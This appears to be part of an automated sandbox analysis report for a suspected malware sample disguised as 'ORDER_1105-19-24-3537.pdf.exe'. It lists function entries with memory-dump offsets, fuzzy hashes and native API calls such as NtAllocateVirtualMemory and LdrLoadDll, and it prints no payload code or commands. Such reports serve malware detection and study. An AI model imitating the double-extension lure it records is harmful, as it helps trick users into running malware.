Instruction Fuzzy Hash: 6D212575604200DFCB14EF24D980B16BF65FB88364F20C569D80A0B25AD33AD807EE62

Function 00FBD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d097db42b7a29a6c97b3cd35fa86bbaddbcfb82cdfe94459456800af40b7fbd7
Instruction ID: 2e9c89109c78da579f885f1147b1d43ff0ee512c25baf990e6789a73f8d554fa
Opcode Fuzzy Hash: d097db42b7a29a6c97b3cd35fa86bbaddbcfb82cdfe94459456800af40b7fbd7
Instruction Fuzzy Hash: 52210771904244DFDB05DF15D9C0F66BB65FB84324F20C56DD9094B256D33AD806EF62

Function 00FBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e079408fbe84b5434a077ec0852d27ab4511ce0273cfd6e3e5c0c9493ac22e5b
Instruction ID: 320010005bd81ba543842032e1a47a4055aebacf88412c7a9df0aa3cf6513be9
Opcode Fuzzy Hash: e079408fbe84b5434a077ec0852d27ab4511ce0273cfd6e3e5c0c9493ac22e5b
Instruction Fuzzy Hash: E5219F755093C08FCB02DF24D994715BF71EB46324F28C5EAD8498F6A7C33A980ADB62

Function 00F9D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction ID: e3cb39c9a60cb00cea0a81bd843c7dde24e74f1de519cf87e9f2f8b3a961e1a6
Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction Fuzzy Hash: 07219D76904240DFDF06CF50D9C4B16BF62FB98324F24C5A9DD490A656C33AD82ADBA2

Function 00F9D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 3af952ecbdcc71d97f04250ed3a4e3f1a750a5d466aff7405ad6fabd46d4b69a
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: E611DF76804280CFDF06CF10D5C4B16BF71FB98328F28C6A9D9490B256C336D85ADBA2

Function 00FBD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: e3f97914fb83d0d1f625e489e13f500cd0f5bc2e8cdfbacb093d5b677e493b87
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: C411BB75904280DFCB06CF10C9C4B15BFA1FB84324F24C6A9D8494B296C33AD80ADF62

Function 00F9D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e38de904df52247eb3a17c2bbd8f01a7b8186df77d1feadef81c413bd6983ce
Instruction ID: 7bfb2cc9be981ab72a3f3d3d9008865742d361666f9ec3a81fd8270eb7910606
Opcode Fuzzy Hash: 7e38de904df52247eb3a17c2bbd8f01a7b8186df77d1feadef81c413bd6983ce
Instruction Fuzzy Hash: 3E012B714043449AFF209E95CD84B67BF9CEF56334F38C52AED084B286C2399801DA72

Function 00F9D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf0d0de00c79d5007a35ecd406562a7093635ec5774fc5b782df1089430158c
Instruction ID: 33eb19285ccaf826543122014ea3e9eeb0fc194944b5b19a3df3e8c5577411cf
Opcode Fuzzy Hash: edf0d0de00c79d5007a35ecd406562a7093635ec5774fc5b782df1089430158c
Instruction Fuzzy Hash: 6AF0F6714043449EFB208E16CC88B62FF98EF52334F28C45AED085B286C2799C40CBB1

Non-executed Functions

Function 05270040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c569d7d33131361f2af32aec42e64cc336839e05c376851205107660d138272c
Instruction ID: 2ad6c2405de1a67f0b70ee07b38a8bef02f6f7dee3bfb0a27944c59fa0d06cf8
Opcode Fuzzy Hash: c569d7d33131361f2af32aec42e64cc336839e05c376851205107660d138272c
Instruction Fuzzy Hash: 2612C7B0C827458AD330CF25E96C9C93BB1BB45395FD44E09C2619B2E5EBB411AACF64

Function 07610040 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54ddf789f381a86e402ab17ffa3b56c2ce9129aab1ac1a877296633f0de1f22
Instruction ID: 2c75170503bf2a25d27969f44e2c604c6f9d84bfa49bc620632cf76a910f2915
Opcode Fuzzy Hash: d54ddf789f381a86e402ab17ffa3b56c2ce9129aab1ac1a877296633f0de1f22
Instruction Fuzzy Hash: AFE1E8B4E001198FCB15DFA9C5849AEFBB2BF89305F248169E415AB356D730AD81CF61

Function 0107D5BC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e28c03de11450213a3d81a73c327fc7def8dc56a343407032c6e1d4c67bc1a1
Instruction ID: b21cc65cd15b66ab813823ca144e493e1b234ce87c26e7456a831c7bc8c3f169
Opcode Fuzzy Hash: 9e28c03de11450213a3d81a73c327fc7def8dc56a343407032c6e1d4c67bc1a1
Instruction Fuzzy Hash: DBA17F36E0021A8FCF05DFB4D8445DEBBF2FF89300B1585AAE915AB265DB31E915CB40

Function 05270006 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e68c07ae153217b53eff87da4bcf215a9d9e6e54370583656d733514093ef97b
Instruction ID: 3de77f6345c45fe44d4a8ece59d233c42130942ee692033d349848c1c6e209fa
Opcode Fuzzy Hash: e68c07ae153217b53eff87da4bcf215a9d9e6e54370583656d733514093ef97b
Instruction Fuzzy Hash: 06C15CB0C827468FD731CF24E8685C93BB1BB85394F944E09D161AF2E5EBB414AACF54

Function 07610006 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e12ecc5b9faee3bbb414fe8e116641a8d86d56606a1a07b1dce8b47cdf16bd1
Instruction ID: 5709e3f770b374f0e9a095041783d529cc058180fa0bf95513dc970c461b4247
Opcode Fuzzy Hash: 4e12ecc5b9faee3bbb414fe8e116641a8d86d56606a1a07b1dce8b47cdf16bd1
Instruction Fuzzy Hash: 36516EB0D052598FCB16CFA9C9405AEBBF2BF8A311F2481AAD405AB356D7349E45CF60

Analysis Process: ORDER_1105-19-24-3537.pdf.exePID: 6644, Parent PID: 6508COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.8%
Signature Coverage:	5.9%
Total number of Nodes:	564
Total number of Limit Nodes:	67

Executed Functions

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

!JA, xrefs: 0041A41C, 0041A428
bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Function 0041A52A Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 2da354779f8dce5e8e82fb92bfc5a15275b0f95102713571776ea2e2e7d656d2
Instruction ID: 386e01b7f5ba63d5dd7728c8051adcf0be814dbd17661781ccd1b2e729f4b12f
Opcode Fuzzy Hash: 2da354779f8dce5e8e82fb92bfc5a15275b0f95102713571776ea2e2e7d656d2
Instruction Fuzzy Hash: 11F0F8B6200148AFCB14DF89DC80EEB7BA9AF88354F158149FA5D97242C630E911CBB4

Function 0041A34A Relevance: 1.5, APIs: 1, Instructions: 31
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
Instruction ID: f5fc7ddbb5e86f402bbff2efb70227236035e06a620103808ba235a4a8e6223b
Opcode Fuzzy Hash: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
Instruction Fuzzy Hash: 29F0A5B2204508AB8B08CFA8D980DEB77EEAB8C314725864CFA5DD7204C634E8528B64

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Function 01182B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182B6A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
Instruction ID: 01dda8826b5a7a105dd8d46dcc220c820ef534b7643bc5fcae3cb943bea3f17b
Opcode Fuzzy Hash: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
Instruction Fuzzy Hash: CE90026160240403460971584514616400A97E1201B55C021E1119590DC62989916229

Function 01182BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182BFA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
Instruction ID: bc8b1d31415c270d062fecd43da47f3ceaba6493430fe8c5a9cf4da25841cea9
Opcode Fuzzy Hash: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
Instruction Fuzzy Hash: 9C90023160140C02D6847158450464A000597D2301F95C015A012A654DCB198B5977A5

Function 01182AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182ADA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
Instruction ID: e158bec955d9ffeb5cde8fba6b17e085d8bd2b05d00d5ae4d47a31d98527bc9e
Opcode Fuzzy Hash: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
Instruction Fuzzy Hash: 4290043571140403070DF55C07045070047D7D7351355C031F111F550CD735CD715335

Function 01182D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182D1A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
Instruction ID: 370906c9048ad11ccbe7420747490d2bea18d30c22147759ccfa6b7d72e45815
Opcode Fuzzy Hash: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
Instruction Fuzzy Hash: 0A90022961340402D6847158550860A000597D2202F95D415A011A558CCA1989695325

Function 01182D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182D3A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
Instruction ID: c75c481db7fe565689b7cac14c99a51aaa6dbd3ec15640884cbd66436cfb0ffb
Opcode Fuzzy Hash: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
Instruction Fuzzy Hash: F790022170140403D644715855186064005E7E2301F55D011E0519554CDA1989565326

Function 01182DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182DDA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
Instruction ID: 94f769341c5831d9a3811a80abb5c2a9601c4d6a61f1eaef06bf416dee4396f4
Opcode Fuzzy Hash: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
Instruction Fuzzy Hash: A8900221642445525A49B15845045074006A7E1241795C012A1519950CC62A9956D725

Function 01182DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182DFA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
Instruction ID: c0c5458101673816b02ba26aa5e1acba579bbf911d0bf756699f354be363f8c4
Opcode Fuzzy Hash: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
Instruction Fuzzy Hash: C790023160140813D61571584604707000997D1241F95C412A0529558DD75A8A52A225

Function 01182C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182C7A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
Instruction ID: 30689f61dd810cf3603ead9ca9d9ed3fd1d02fd747140383557d48c4b58b9aa8
Opcode Fuzzy Hash: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
Instruction Fuzzy Hash: 1290023160148C02D6147158850474A000597D1301F59C411A4529658DC79989917225

Function 01182CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182CAA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
Instruction ID: 518b6a0ee20492b08b29681ac14940f96db0b4d9d48e427d934c02ae50a52979
Opcode Fuzzy Hash: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
Instruction Fuzzy Hash: 0890023160140802D60475985508646000597E1301F55D011A5129555EC76989916235

Function 01182F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182F3A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
Instruction ID: e1216458d1a49d6a927dcee3e75171f97e8e3b3de3ed3e025c820326db46f133
Opcode Fuzzy Hash: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
Instruction Fuzzy Hash: AA90026174140842D60471584514B060005D7E2301F55C015E1169554DC71DCD52622A

Function 01182F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182F9A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
Instruction ID: dd4a540615650f48a55dc8989d45d27bb0b6881ee37e244c25f19aa10c90a4cf
Opcode Fuzzy Hash: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
Instruction Fuzzy Hash: 4F90023160180802D6047158491470B000597D1302F55C011A1269555DC72989516675

Function 01182FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182FBA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
Instruction ID: 69d8a2ffdeaa1bcb67944dc896138187a1fd1b0737d862991da3817e3b0f479e
Opcode Fuzzy Hash: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
Instruction Fuzzy Hash: 15900221A01404424644716889449064005BBE2211755C121A0A9D550DC65D89655769

Function 01182FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182FEA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
Instruction ID: e867fbb3a4a5184c96a89b2cdc994db672448cc562f692af3603871d06bbc21e
Opcode Fuzzy Hash: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
Instruction Fuzzy Hash: 3C900221611C0442D70475684D14B07000597D1303F55C115A0259554CCA1989615625

Function 01182E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

